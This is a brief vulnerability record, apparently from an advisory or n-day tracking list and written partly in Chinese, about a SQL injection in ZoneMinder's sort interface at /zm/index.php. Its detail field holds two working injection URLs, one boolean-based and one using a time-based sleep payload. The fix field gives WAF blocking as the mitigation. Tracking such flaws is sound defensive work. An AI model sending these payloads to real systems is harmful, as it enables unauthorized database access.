vendor = "ZoneMinder"
name = "ZoneMinder系统sort接口存在SQL注入漏洞"
type = "SQL注入"
version = "未知"
path = "/zm/index.php"
detail = "/zm/index.php?limit=20&mid=-1%20OR%203*2*1=6%20AND%20000322=000322&order=desc&request=watch&sort=Id&view=request /zm/index.php?sort=**if(now()=sysdate()%2Csleep(6)%2C0)**&order=desc&limit=20&view=request&request=watch&mid=1"
fix = "WAF封禁路路径，等待发布补丁"
date = "0819"
label = "nday"
